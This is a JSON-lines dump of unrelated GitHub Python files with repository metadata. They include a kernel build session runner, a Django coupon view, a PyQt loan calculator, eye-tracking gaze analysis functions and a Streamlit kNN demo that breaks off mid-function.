Industry\"\n\t]\n)","repo_name":"saianupkumarp/pyDatahub","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32178440595","text":"import logging\nfrom shutil import copyfile\n\nimport inquirer\nfrom inquirer.themes import load_theme_from_dict\nfrom modules.compiler.build import make_build\nfrom modules.compiler.clean import make_clean\nfrom modules.compiler.defconfig import make_defconfig\nfrom modules.compiler.menuconfig import make_menuconfig\nfrom modules.inquirer.save import app_save_config\nfrom modules.manager.cmd import run_command\nfrom modules.manager.json import dump_json_file\nfrom modules.obtainer.compiler import get_compiler_path\nfrom modules.zipper.config import config_anykernel\nfrom modules.zipper.makezip import copy_to_anykernel, make_flashable_zip\nfrom modules.zipper.signer import zip_signer\n\n\ndef run_session(self):\n \"\"\"Application `main session`\n\n Actions\n -------\n 1) \"Make clean and mrproper\"\n 2) \"Make defconfig\"\n 3) \"Make menuconfig\"\n 4) \"Make build\"\n 5) \"Make zip\"\n 6) \"Sign zip\"\n \"\"\"\n # Make clean/mrproper\n if self.session['answers']['cleanbuild'] is True:\n make_clean(self)\n\n # Make defconfig\n if self.session['mode'] in ['newbuild', 'menuconfig']:\n make_defconfig(self)\n\n # Make menuconfig\n if self.session['answers']['menuconfig'] is True:\n make_menuconfig(self)\n\n # Save new defconfig?\n save_config = inquirer.prompt(\n app_save_config(self),\n theme=load_theme_from_dict(self.theme)\n )\n if save_config['save'] is True:\n\n run_command(\n 'cp {kernel}/.config {path}/{config}'.format(\n kernel=self.session['out_folder'],\n config=save_config['defconfig_name'],\n path=self.session['defconfig_folder']\n ),\n exit_on_error=True\n )\n logging.info(self.trad('successfully saved'))\n\n # Make build\n if self.session['mode'] == 'newbuild':\n self.session['compiler_path'] = get_compiler_path(self)\n make_build(self)\n config_anykernel(self)\n copy_to_anykernel(self)\n make_flashable_zip(self)\n zip_signer(self)\n\n # Copy logs\n logging.info(self.trad('saving build logs to android/logs...'))\n dump_json_file(\n self.session,\n '{codename}-{date}.json'.format(\n codename=self.session['device_codename'],\n date=self.session['datetime']\n )\n )\n copyfile(\n 'zmb.log',\n 'android/logs/{codename}-{date}.log'.format(\n codename=self.session['device_codename'],\n date=self.session['datetime']\n )\n )\n\n # Make Zip\n elif self.session['mode'] == 'makezip':\n copy_to_anykernel(self)\n config_anykernel(self)\n make_flashable_zip(self)\n\n # Zip Signer\n elif self.session['mode'] == 'zipsigner':\n self.session['build_name'] = self.session['answers']['zipsigner']\n zip_signer(self)\n","repo_name":"grm34/PyZenMaxBuilder","sub_path":"modules/session/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"43655137388","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@Description: 使用到的工具。比如感知机要求类别为-1和1,所以要将0类改成-1类。\n@Time : 2021-3-7 15:26 \n@File : utils.py \n@Software: PyCharm\n\"\"\"\nfrom sklearn import datasets\nfrom sklearn import model_selection\nimport numpy as np\nimport random\n\n\ndef setup_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n\n\ndef relabel(origin_y):\n y_temp = origin_y - 1\n final_y = y_temp + origin_y\n return final_y\n\n\ndef dataloader(ratio=0.9): # ratio trainset:allset\n breast_cancer_data = datasets.load_breast_cancer()\n features = breast_cancer_data.data # 特征\n targets = breast_cancer_data.target # 类别\n assert len(set(targets)) == 2, \"目前我们只解决二分类问题\"\n assert targets.max() == 1, \"应该至少保证有一类为1\"\n if targets.min() == 0:\n targets = relabel(targets)\n x_train, x_test, y_train, y_test = model_selection.train_test_split(features, targets, train_size=ratio)\n return x_train, x_test, y_train, y_test","repo_name":"Spirefall/MechineLearningClassProject","sub_path":"perceptron/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38530095584","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\ngood_job = True\nnumbers = list()\n\nn = int(input())\n\nfor i in range(1,n+1):\n numbers.append(int(input()))\n\nfor j in range(1,numbers[-1]):\n if j not in numbers:\n print(j)\n good_job = False\n\nif good_job:\n print(\"good job\")\n","repo_name":"shakenn0tstirred/kattis","sub_path":"missingnumbers.py","file_name":"missingnumbers.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"72084219072","text":"import coupons.forms\nimport coupons.models\n\nimport django.http\nimport django.shortcuts\nimport django.utils.timezone\nimport django.views.generic\n\n\nclass CouponActivateView(django.views.generic.View):\n \"\"\"активируем купон\"\"\"\n\n def post(\n self, request: django.http.HttpRequest\n ) -> django.http.HttpResponse:\n \"\"\"получаем купон по коду и текущему времени\"\"\"\n now_time = django.utils.timezone.now()\n form = coupons.forms.CouponActivateForm(request.POST)\n if form.is_valid():\n code = form.cleaned_data['code']\n coupon = coupons.models.Coupon.objects.filter(\n code__iexact=code,\n is_active=True,\n valid_since__lte=now_time,\n valid_to__gte=now_time,\n ).first()\n request.session['coupon_id'] = coupon.pk if coupon else None\n return django.shortcuts.redirect('cart:detail')\n","repo_name":"fivan999/online_shop","sub_path":"online_shop/coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"37214478362","text":"\"\"\"\n统计数据集中轨迹点数据采集的时间间隔\n\"\"\"\n\nimport sys\n\nif sys.platform == 'linux':\n sys.path.append('/root/trajectory_handle/')\nfrom ast import literal_eval\nfrom datetime import datetime\nimport numpy as np\nfrom trajectory.cal_distance import haversine\n\n\nlinux_path = \"/root/taxiData\"\nwindows_path = \"H:/TaxiData\"\nbase_path = windows_path + \"/trajectory_without_filter/\"\n\nfile_path1 = \"2014-10-20\"\nfile_path2 = \"2014-10-21\"\nfile_path3 = \"2014-10-22\"\nfile_path4 = \"2014-10-23\"\nfile_path5 = \"2014-10-24\"\nfile_path6 = \"2014-10-25\"\nfile_path7 = \"2014-10-26\"\n\n# file_paths = [file_path1, file_path2, file_path3, file_path4, file_path5, file_path6, file_path7]\nfile_paths = [file_path5]\nfor file_path in file_paths:\n youke = base_path + file_path + \"/trajectory_\" + file_path + \".npy\"\n\n youke_times = []\n\n youke_trajectories = np.load(youke).tolist()\n for trajectory in youke_trajectories:\n youke_times.append((datetime.strptime(str(trajectory[-1][3]), \"%Y-%m-%d %H:%M:%S\") -\n datetime.strptime(str(trajectory[0][3]), \"%Y-%m-%d %H:%M:%S\")).seconds)\n\n print(\"day: {}, youke_avg time: {}\".format(file_path, sum(youke_times) / len(youke_times)))","repo_name":"haocdp/trajectory_handle","sub_path":"paper/get_avg_tra_len.py","file_name":"get_avg_tra_len.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"785952391","text":"import os\nimport urllib\n\nfrom configs import configure_manager\nfrom input_adapters import AVL_INPUT_ADAPTERS\nfrom plots import CandlestickPlot\nfrom exceptions import InputStringException\nfrom indicators import Ema\n\n\ndef match_input(input: str):\n \"\"\"Searches for a matching adapter for the input data\"\"\"\n if urllib.parse.urlparse(input).scheme:\n raise InputStringException('Data download links are not supported yet')\n\n if not os.path.isfile(input):\n raise InputStringException('The file was not found at the specified path')\n\n file_extension = os.path.splitext(input)[-1]\n for input_adapter in AVL_INPUT_ADAPTERS:\n if file_extension == input_adapter.FILE_EXTENSION:\n return input_adapter(file_path=input)\n raise InputStringException(\n f'{input} is not supported, specify'\n f' a file with a valid extension '\n f'{[adapter.FILE_EXTENSION for adapter in AVL_INPUT_ADAPTERS]}'\n f' or a link to download the data.'\n )\n\n\ndef main():\n \"\"\"Main function of the project\"\"\"\n plot_manager = configure_manager()\n args = plot_manager.parse_args()\n\n input_adapter = match_input(input=args.input)\n plot_data = input_adapter.get_dataframe(interval_minutes=args.interval_minutes)\n\n indicators = []\n if args.ema:\n indicators.append(Ema(plot_data=plot_data, period=args.ema))\n\n CandlestickPlot(plot_data=plot_data, indicators=indicators).show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Todvaa/test_task_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28095246645","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"d0ana\")\n\n\n# initialize MessageLogger and output report\nprocess.load(\"FWCore.MessageLogger.MessageLogger_cfi\")\n#process.MessageLogger.cerr.threshold = 'INFO'\n#process.MessageLogger.categories.append('Demo')\n#process.MessageLogger.cerr.INFO = cms.untracked.PSet(\n# limit = cms.untracked.int32(-1)\n# )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32(1000)\nprocess.options = cms.untracked.PSet( wantSummary =\ncms.untracked.bool(True) )\nprocess.options.numberOfThreads = cms.untracked.uint32(8)\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1)\n)\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring('/store/user/anstahll/MTD/VertexCompositeAnalysis/HydJets_mc_mtd_D0_ANASKIM_20190308/MinBias_Hydjet_Drume5_5p5TeV_TuneCP5_Pythia8/HydJets_mc_mtd_D0_ANASKIM_20190308/190308_101848/0000/hyjets_d0_101.root'),\n )\nprocess.load(\"VertexCompositeAnalysis.VertexCompositeAnalyzer.d0selector_cff\")\nprocess.load(\"VertexCompositeAnalysis.VertexCompositeAnalyzer.d0analyzer_ntp_cff\")\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string('hyjets_mc_mtd_d0.root')\n )\n\nprocess.d0ana_mc.isUseMtd = cms.untracked.bool(True);\nprocess.d0ana_mc.doRecoNtuple = cms.untracked.bool(True)\nprocess.d0ana_mc.doGenNtuple = cms.untracked.bool(True)\nprocess.d0ana_mc.doGenMatching = cms.untracked.bool(False)\nprocess.d0ana_mc.VertexCollection = cms.untracked.InputTag(\"offlinePrimaryVertices4D\")\nprocess.d0ana_mc.VertexCompositeCollection = cms.untracked.InputTag(\"d0selectorMC:D0\")\nprocess.d0ana_mc.MVACollection = cms.InputTag(\"d0selectorMC:MVAValuesNewD0\")\nprocess.d0ana_mc.isCentrality = cms.bool(True)\n\nprocess.d0selectorMC.VertexCollection = cms.untracked.InputTag(\"offlinePrimaryVertices4D\")\n\nprocess.d0ana_seq = cms.Sequence(process.d0selectorMC * process.d0ana_mc)\n\nprocess.p = cms.Path(process.d0ana_seq)\n","repo_name":"yszhang95/MTDStudies","sub_path":"DOE20210402/configs/Reproduction/HyJets_PhaseIIMTD_D0_mc_ntuple.py","file_name":"HyJets_PhaseIIMTD_D0_mc_ntuple.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"31564066048","text":"import unittest\nimport logging\nimport os.path\nimport os\n\nfrom .audio_opt import AudioProcessor, SilenceAudioSegment\nfrom .probe import AVProp\n\n\nclass SilenceAudioSegmentTest(unittest.TestCase):\n def test_gen_slient_audio(self):\n audio_path = \"test.mp3\"\n SilenceAudioSegment.silent(duration=5000 * 2).export(audio_path)\n prob = AVProp(audio_path)\n logging.debug(f\"duration: {prob.fmt_duration_sec()}\")\n self.assertTrue(os.path.getsize(audio_path) > 0)\n self.assertTrue(prob.fmt_duration_sec() > 4)\n os.remove(audio_path)\n\n\nclass AudioProcessorTest(unittest.TestCase):\n def test_convert(self):\n audio_path = \"test.mp3\"\n SilenceAudioSegment.silent(duration=5000 * 2).export(audio_path)\n prob = AVProp(audio_path)\n logging.debug(f\"duration: {prob.fmt_duration_sec()}\")\n self.assertTrue(os.path.getsize(audio_path) > 0)\n self.assertTrue(prob.fmt_duration_sec() > 4)\n\n wav_file_path = \"test.wav\"\n AudioProcessor.convert_2_wav(audio_path, wav_file_path)\n prob_wav = AVProp(wav_file_path)\n logging.debug(f\"duration: {prob_wav.fmt_duration_sec()}, {prob_wav.audio_ext}\")\n self.assertTrue(os.path.getsize(wav_file_path) > 0)\n self.assertTrue(prob_wav.fmt_duration_sec() > 4)\n self.assertTrue(prob_wav.audio_ext == \".wav\")\n\n mp3_file_path = \"test_new.mp3\"\n AudioProcessor.convert_2_mp3(wav_file_path, mp3_file_path)\n prob_mp3 = AVProp(mp3_file_path)\n logging.debug(f\"duration: {prob_mp3.fmt_duration_sec()}, {prob_mp3.audio_ext}\")\n self.assertTrue(os.path.getsize(wav_file_path) > 0)\n self.assertTrue(int(prob_mp3.fmt_duration_sec()) == int(prob.fmt_duration_sec()))\n self.assertTrue(prob_mp3.audio_ext == \".mp3\")\n\n os.remove(audio_path)\n os.remove(wav_file_path)\n os.remove(mp3_file_path)\n\n\n# python3 -m pytest -o log_cli=true -o log_cli_level=DEBUG py_utils/src/av/audio_opt_test.py\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"k9bao/py_utils","sub_path":"src/av/audio_opt_test.py","file_name":"audio_opt_test.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20710661173","text":"\n# coding: utf-8\n\n# In[9]:\n\ndef ImportGazeFile (filename):\n data = pd.read_csv(filename, sep= \"\\t\")\n return(data.head())\n\n\n# In[3]:\n\ndef GazeData(AOIOneCoor, AOITwoCoor, xcoor, ycoor, subs, time, stim):\n \n import numpy as np\n import pandas as pd\n import matplotlib as plt\n import matplotlib.ticker as ticker\n get_ipython().magic('matplotlib inline')\n \n #the AOI variables expect a list of length 4: xmin, ymin, xmax, ymax\n AOIOneXmin = AOIOneCoor[0] \n AOIOneYmin = AOIOneCoor[1] \n AOIOneXmax = AOIOneCoor[2] \n AOIOneYmax = AOIOneCoor[3]\n\n AOITwoXmin = AOIOneCoor[0] \n AOITwoYmin = AOIOneCoor[1] \n AOITwoXmax = AOIOneCoor[2] \n AOITwoYmax = AOIOneCoor[3] \n\n trialNum = []\n trialList = []\n trialLen = []\n curstim = []\n subList = []\n gazedur1 = []\n gazedur2 = []\n for subID in set(subs):\n #get index of trial changes, based on change in stim name, 'MediaName' variable\n trials = np.roll(stim[subs == subID],1)!=stim[subs == subID] # onset of change in trial\n trialsOFF = np.roll(stim[subs == subID],-1)!=stim[subs == subID] # offset of change in trial\n trialLen.extend(np.subtract(time[subs == subID][trialsOFF], time[subs == subID][trials]))# build list of trial lengths for output dataframe\n trialNum.extend(trials.cumsum()) #get trial number by increasing trial number each time a new trial onset is found\n trialList.extend(np.unique(trialNum)) # build list of trials by subject for output dataframe\n subList.extend([subID]*len(trialList)) # build list of subjects for output dataframe\n\n for Trial in np.unique(trialNum):\n\n # Get onset/offset of gaze event changes for current subject and trial for AOIOne\n eventON1 = np.roll(AOIOne[subs == subID][trialNum == Trial],1) != AOIOne[subs == subID][trialNum == Trial]\n eventOFF1 = np.roll(AOIOne[subs == subID][trialNum == Trial],-1) != AOIOne[subs == subID][trialNum == Trial]\n\n # Get onset/offset of gaze event changes for current subject and trial for AOITwo\n eventON2 = np.roll(AOITwo[subs == subID][trialNum == Trial],1) != AOITwo[subs == subID][trialNum == Trial]\n eventOFF2 = np.roll(AOITwo[subs == subID][trialNum == Trial],-1) != AOITwo[subs == subID][trialNum == Trial]\n\n curstim.append(np.array(stim[subs == subID][trialNum == Trial])[0]) # build list of stimulus name for output dataframe\n\n # Get the difference between the gaze event onset and offset values in the timestamp, to get the total duration of gaze event, then sum up these events for the trial\n gazedur1.append(np.subtract(time[subs == subID][trialNum == Trial][AOIOne == True][eventOFF1], time[subs == subID][trialNum == Trial][AOIOne == True][eventON1]).sum())\n # Get the difference between the gaze event onset and offset values in the timestamp, to get the total duration of gaze event, then sum up these events for the trial\n gazedur2.append(np.subtract(time[subs == subID][trialNum == Trial][AOITwo == True][eventOFF2], time[subs == subID][trialNum == Trial][AOITwo == True][eventON2]).sum())\n \n # Build data frame from lists created in for loops\n outputDF = pd.DataFrame({'Subject': subList,\n 'Trial': trialList,\n 'TrialDuration_ms': trialLen,\n 'Stimulus': curstim,\n 'AOI_One_ms': gazedur1,\n 'AOI_Two_ms': gazedur2})\n outputDF = outputDF[['Subject','Trial', 'TrialDuration_ms','Stimulus', 'AOI_One_ms', 'AOI_Two_ms']]\n return(outputDF)\n\n\n# In[8]:\n\ndef GazeDataGroup (outputDF, kind):\n if kind == 'stim':\n outputGROUP = outputDF.groupby(by = \"Stimulus\").mean() #get mean looking time to AOIs by stimulus name\n\n elif kind == 'sub':\n outputGROUP = outputDF.groupby(by = \"Subject\").mean() #get mean looking time to AOIs by subject ID\n\n elif kind == 'trial':\n outputGROUP = outputDF.groupby(by = \"Trial\").mean() #get mean looking time to AOIs by trial ID\n \n return(outputGROUP)\n\n\n# In[10]:\n\ndef ExportGazeData (filetitle, outputDF):\n outputDF.to_csv(filetitle + '.csv')\n\n\n# In[14]:\n\ndef PlotTrialProp(outputGROUP, kind):\n if kind == 'stim':\n outputGROUP.AOI1propLook = (outputGROUP.AOI_One_ms/outputGROUP.TrialDuration_ms)\n outputGROUP.AOI2propLook = (outputGROUP.AOI_Two_ms/outputGROUP.TrialDuration_ms)\n ax = outputGROUP.AOI1propLook.plot(color='r', figsize=(30, 10), legend = True, label = 'AOI One')\n outputGROUP.AOI2propLook.plot(color='b', legend = True, label = 'AOI Two')\n tick_spacing = 5\n ax.set_xlabel('Stimulus', fontsize = 20)\n ax.set_ylabel('Proportion of looking to AOI', fontsize = 20)\n ax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\n ax.tick_params(labelsize=20)\n elif kind == 'trial':\n outputTRIAL.AOI1propLook = (outputTRIAL.AOI_One_ms/outputTRIAL.TrialDuration_ms)\n outputTRIAL.AOI2propLook = (outputTRIAL.AOI_Two_ms/outputTRIAL.TrialDuration_ms)\n ax = outputTRIAL.AOI1propLook.plot(color='r', figsize=(30, 10), legend = True, label = 'AOI One')\n outputTRIAL.AOI2propLook.plot(color='b', legend = True, label = 'AOI Two')\n tick_spacing = 5\n ax.set_xlabel('Trial', fontsize = 20)\n ax.set_ylabel('Proportion of looking to AOI', fontsize = 20)\n ax.xaxis.set_major_locator(ticker.MultipleLocator(tick_spacing))\n ax.tick_params(labelsize=20)\n\n\n# In[ ]:\n\nImportGazeFile()\n\n","repo_name":"antovich/UC-Davis","sub_path":"Python/PyTracking Project/PyTrackingFunctions.py","file_name":"PyTrackingFunctions.py","file_ext":"py","file_size_in_byte":5610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29553312726","text":"from django.db import models\nimport uuid\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom api.helpers.mail import send_mail\nfrom django.template.loader import render_to_string\n\nclass Message(models.Model):\n name = models.CharField(max_length=150, blank=False)\n email = models.EmailField(blank=False)\n message = models.TextField(blank=False)\n created = models.DateTimeField(auto_now_add=True)\n\n \n@receiver(post_save, sender=Message)\ndef send_notification(sender, instance, created, **kwargs):\n if created:\n context = {\n 'message': instance,\n }\n\n html_content = render_to_string(\n 'api/contact_message_notification.html', context\n )\n\n send_mail(\n to_emails=\"me@andrewtolochka.com\",\n subject=f'New contact message from {instance.name}',\n html_content=html_content\n )\n","repo_name":"socialize-berlin/backend","sub_path":"api/models/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"10302838733","text":"####################################\r\n# 贷款利率计算 练习\r\n# 作者 最爱点灯的星星\r\n# Ver1.0\r\n# 目前没有加入异常处理,只能实现等额本息\r\n######################################\r\n\r\nimport sys\r\nfrom PyQt5 import QtCore, QtGui, uic, QtWidgets\r\n\r\nuiFile = \"loan.ui\"\r\nUi_MyMainWindow, QtBaseClass = uic.loadUiType(uiFile)\r\n\r\n\r\nclass MyApp(QtWidgets.QMainWindow, Ui_MyMainWindow):\r\n def __init__(self):\r\n QtWidgets.QMainWindow.__init__(self)\r\n Ui_MyMainWindow.__init__(self)\r\n self.setupUi(self)\r\n self.butt_calc.clicked.connect(self.loan_Compute)\r\n\r\n def loan_Compute(self):\r\n self.outlist.clear()\r\n\r\n loan_Num = int(self.loannum.text()) #借款总金额\r\n Annual_interest_rate = (self.rate.value())/100 #年化利率 不用输%号\r\n stage = self.period.value() #借款期数 (按月为单位!)\r\n\r\n for ii in range(1,stage + 1):\r\n if(ii == 1):\r\n monthly_all = loan_Num * (Annual_interest_rate / 12) * pow((1 + (Annual_interest_rate / 12)), stage) / (\r\n pow((1 + (Annual_interest_rate / 12)), stage) - 1) # 月均还款(本金+利息)\r\n repay_rate_all = stage * loan_Num * (Annual_interest_rate / 12) * pow((1 + (Annual_interest_rate / 12)),\r\n stage) / (pow((1 + (Annual_interest_rate / 12)), stage) - 1) - loan_Num # 还款利息总和\r\n repay_rate_1 = loan_Num * (Annual_interest_rate / 12) # 还款利息\r\n surplus_rate = repay_rate_all - repay_rate_1 # 剩余利息\r\n surplus_loan_num = loan_Num - (monthly_all - repay_rate_1) # 剩余本金\r\n outstr = \"1: 利息 %.3f 本金 %.3f 还款总额(本金+利息) %.3f \" % ( repay_rate_1, monthly_all - repay_rate_1, monthly_all)\r\n else:\r\n repay_rate_n_1 = (loan_Num * (Annual_interest_rate/12) - monthly_all)*pow((1 + (Annual_interest_rate/12)),(ii - 1)) + monthly_all\r\n surplus_loan_num = monthly_all - repay_rate_n_1\r\n outstr = \"{} : 利息 {} 本金 {} 还款总额(本金+利息){}\".format(ii, repay_rate_n_1, surplus_loan_num, monthly_all)\r\n\r\n self.outlist.addItem(outstr)\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n Main_window = MyApp()\r\n Main_window.show()\r\n sys.exit(app.exec_())","repo_name":"InOrderToGo/pythonlearn","sub_path":"loan.py","file_name":"loan.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"31956138998","text":"from asyncpg import Connection\n\nfrom mautrix.util.async_db import UpgradeTable\n\nupgrade_table = UpgradeTable()\n\n\n@upgrade_table.register(description=\"Initial revision\")\nasync def upgrade_v1(conn: Connection) -> None:\n await conn.execute(\"CREATE TYPE twitter_conv_type AS ENUM ('ONE_TO_ONE', 'GROUP_DM')\")\n await conn.execute(\n \"\"\"CREATE TABLE portal (\n twid VARCHAR(255),\n receiver BIGINT,\n conv_type twitter_conv_type NOT NULL,\n other_user BIGINT,\n mxid VARCHAR(255),\n name VARCHAR(255),\n encrypted BOOLEAN NOT NULL DEFAULT false,\n\n PRIMARY KEY (twid, receiver)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE \"user\" (\n mxid VARCHAR(255) PRIMARY KEY,\n twid BIGINT,\n auth_token VARCHAR(255),\n csrf_token VARCHAR(255),\n poll_cursor VARCHAR(255),\n notice_room VARCHAR(255)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE puppet (\n twid BIGINT PRIMARY KEY,\n name VARCHAR(255),\n photo_url VARCHAR(255),\n photo_mxc VARCHAR(255),\n\n is_registered BOOLEAN NOT NULL DEFAULT false,\n\n custom_mxid VARCHAR(255),\n access_token TEXT,\n next_batch VARCHAR(255)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE user_portal (\n \"user\" BIGINT,\n portal VARCHAR(255),\n portal_receiver BIGINT,\n in_community BOOLEAN NOT NULL DEFAULT false,\n\n FOREIGN KEY (portal, portal_receiver) REFERENCES portal(twid, receiver)\n ON UPDATE CASCADE ON DELETE CASCADE\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE message (\n mxid VARCHAR(255) NOT NULL,\n mx_room VARCHAR(255) NOT NULL,\n twid BIGINT,\n receiver BIGINT,\n\n PRIMARY KEY (twid, receiver),\n UNIQUE (mxid, mx_room)\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TYPE twitter_reaction_key AS ENUM (\n 'funny', 'surprised', 'sad', 'like', 'excited', 'agree', 'disagree'\n )\"\"\"\n )\n await conn.execute(\n \"\"\"CREATE TABLE reaction (\n mxid VARCHAR(255) NOT NULL,\n mx_room VARCHAR(255) NOT NULL,\n tw_msgid BIGINT,\n tw_receiver BIGINT,\n tw_sender BIGINT,\n reaction twitter_reaction_key NOT NULL,\n\n PRIMARY KEY (tw_msgid, tw_receiver, tw_sender),\n FOREIGN KEY (tw_msgid, tw_receiver) REFERENCES message(twid, receiver)\n ON DELETE CASCADE ON UPDATE CASCADE,\n UNIQUE (mxid, mx_room)\n )\"\"\"\n )\n\n\n@upgrade_table.register(description=\"Add double-puppeting base_url to puppet table\")\nasync def upgrade_v2(conn: Connection) -> None:\n await conn.execute(\"ALTER TABLE puppet ADD COLUMN base_url TEXT\")\n\n\n@upgrade_table.register(description=\"Store Twitter reaction IDs for marking things read\")\nasync def upgrade_v3(conn: Connection) -> None:\n await conn.execute(\"ALTER TABLE reaction ADD COLUMN tw_reaction_id BIGINT\")\n","repo_name":"roghumi/matrix-twitter","sub_path":"mautrix_twitter/db/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"60"} +{"seq_id":"35265000399","text":"# https://github.com/sudhir-voleti/MLBM/blob/master/Lec2a%20KNNs_for_Classif_%26_Regn.ipynb\r\n\r\n#importing libraries\r\nimport streamlit as st\r\nimport mglearn\r\nimport graphviz\r\n\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\nimport time\r\nimport pandas as pd\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.neighbors import KNeighborsRegressor\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.datasets import load_breast_cancer\r\n\r\nfrom sklearn.metrics import mean_squared_error \r\nimport math\r\n\r\nst.set_option('deprecation.showfileUploaderEncoding', False)\r\nst.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n\r\n@st.cache(persist=True) # It will help in storing dataset and do not read again when any change is done on UI\r\ndef load_data(file):\r\n data = pd.read_csv(file)\r\n return data\r\n \r\n@st.cache(persist=True) \r\ndef preprocess_data(data):\r\n #Missing Value imputation and encoding categorical columns\r\n for col in data.columns:\r\n if data[col].dtypes=='object':\r\n data[col]=data[col].fillna(data[col].mode()[0])\r\n label = LabelEncoder()\r\n data[col] = label.fit_transform(data[col])\r\n else:\r\n data[col]=data[col].fillna(data[col].median())\r\n return data\r\n\r\n@st.cache(persist=True)\r\ndef split(df,test_size,target,predictors):\r\n y = df[target]\r\n x = df[predictors]\r\n x_train, x_test, y_train, y_test = train_test_split(x,y,test_size=test_size,random_state=0)\r\n return x_train, x_test, y_train, y_test\r\n\r\n\r\n#Function to simulate dummy dataset for classification problem\r\n\r\ndef simulate_data_classification():\r\n # simulate a dummy dataset \r\n X, y = mglearn.datasets.make_forge()\r\n print(\"X.shape:\", X.shape)\r\n\r\n # see data pattern\r\n mglearn.discrete_scatter(X[:, 0], X[:, 1], y)\r\n\r\n # plot parms\r\n plt.legend([\"Class 0\", \"Class 1\"], loc=4)\r\n plt.xlabel(\"First feature\")\r\n plt.ylabel(\"Second feature\")\r\n plt.show()\r\n \r\n#Function to simulate dummy dataset for regression problem\r\n\r\ndef simulate_data_regression():\r\n X, y = mglearn.datasets.make_wave(n_samples=40)\r\n test_data = [-1.5, 0.9, 1.5]\r\n\r\n # view data scatterplot pattern\r\n plt.plot(X, y, 'bo', label=\"data\")\r\n plt.plot(test_data, [-2.7, -2.7, -2.7], 'g*', label=\"test points\")\r\n plt.xlabel(\"Feature\")\r\n plt.ylabel(\"Target\")\r\n plt.legend()\r\n\r\n\r\n#function to build kNN using mglearn inbuilt figures.\r\n\r\ndef kNN_mglearn_classification(n_neighbors):\r\n return mglearn.plots.plot_knn_classification(n_neighbors=n_neighbors)\r\n \r\n \r\ndef kNN_mglearn_regression(n_neighbors):\r\n return mglearn.plots.plot_knn_regression(n_neighbors=n_neighbors)\r\n \r\n \r\n\r\n#Function to split the data and to fit the model\r\n\r\ndef data_split_classification(test_size,n):\r\n X, y = mglearn.datasets.make_forge()\r\n #stratified train-test split with random seed\r\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=test_size,random_state=0)\r\n \r\n ## instantiate model and training model on train data\r\n \r\n clf = KNeighborsClassifier(n_neighbors=n).fit(X_train, y_train) \r\n return X_train,X_test,y_train,y_test,clf\r\n \r\n \r\ndef data_split_regression(test_size):\r\n X, y = mglearn.datasets.make_wave(n_samples=40)\r\n\r\n # split the wave dataset into a training and a test set\r\n X_train, X_test, y_train, y_test = train_test_split(X, y,test_size=test_size,random_state=0)\r\n return X_train,X_test,y_train,y_test\r\n \r\n#Function to check accuracy and plot for the kNN classification model\r\n\r\ndef kNN_classification_pred_plot(test_size,n):\r\n X_train,X_test,y_train,y_test,clf=data_split_classification(test_size,n)\r\n predictions=clf.predict(X_test)\r\n \r\n # plotting train & test pts separately\r\n y_train_0 = (y_train == 0) # make indices\r\n y_train_1 